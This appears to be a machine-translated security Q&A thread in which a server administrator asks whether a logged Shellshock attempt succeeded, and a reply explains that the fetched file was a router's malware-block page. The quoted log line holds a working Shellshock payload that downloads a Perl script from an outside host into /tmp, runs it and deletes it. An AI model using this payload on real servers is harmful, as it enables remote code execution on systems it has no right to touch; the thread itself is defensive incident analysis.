Evidencia de Shellshock Exploit: ¿es este un ataque exitoso?

8

Estuve revisando los registros hoy y noté lo siguiente:

 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/bo.pl;chmod +x /tmp/bo.pl;perl /tmp/bo.pl;rm -rf /tmp/bo*\""

Según tengo entendido, este es un intento de analizar la vulnerabilidad de shellshock. Recuperé el archivo cargado bo.pl, que contenía lo siguiente ...

<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://192.168.1.1/blocking.asp?cat_id=78">
</head>
<body></body>
</html>

Ahora, como lo entiendo, está utilizando la técnica de actualización para mostrar una página de bloqueo de asas de algún tipo.

Estoy seguro, dada la evidencia de que se trató de un ataque malicioso. Lo que me preocupa es que el registro muestra 13501 para la longitud de la respuesta. Pero cuando intenté usar el encabezado de shellshock simple para probar la capacidad ...

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

Solo recibí la siguiente entrada de registro ...

71.121.200.199 - - [26/Dec/2016:18:14:11 -0100] "GET / HTTP/1.1" 200 22 "-" "() { :; }; /bin/eject"

También fui a revisar el directorio / tmp y encontré dos archivos que no se corresponden exactamente con la hora de los registros pero parecen sospechosos, ya que se trata de un servidor sin cabeza y parecen estar vinculados a servicios de escritorio remoto de algún tipo.

-rw-r--r--  1 0 0    8 Dec 25 03:46 httpd_lua_shm.2693
drwxrwxrwt  2 0 0 4096 Dec 24 18:42 .ICE-unix

Entonces, mi pregunta es: ¿esto parece ser un ataque exitoso debido al hecho de que los bytes en la respuesta son tan grandes? ¿Hay algún otro lugar en el que debería estar revisando, además del historial de bash, para buscar pistas sobre lo que sucedió?

    
pregunta Twenty Five 27.12.2016 - 02:36
fuente

1 respuesta

1

Now as I understand it this is using the refresh technique to display a blocking.asp page of some sort.

La página que se devolvió cuando solicitó enlace es una página de bloqueo atendida por su Asus WRT: enlace

["Home Protection", "78", "Malicious site blocked", "", "Sites used by malicious programs, including sites used to host upgrades or store stolen information."]

El archivo bo.pl debería haber sido un script perl. El ataque intentó descargarlo y ejecutarlo, luego eliminarlo del sistema. Si tiene registros de ejecución del sistema, debería poder ver si se ejecutó.

Intenta y haz lo mismo con tu servidor. La única diferencia que veo en tu solicitud es la versión HTTP utilizada (1 vs 1.1), por lo que puede haber servido una cantidad diferente de bytes.

    
respondido por el Nick Simonian 03.08.2017 - 15:08
fuente

Lea otras preguntas en las etiquetas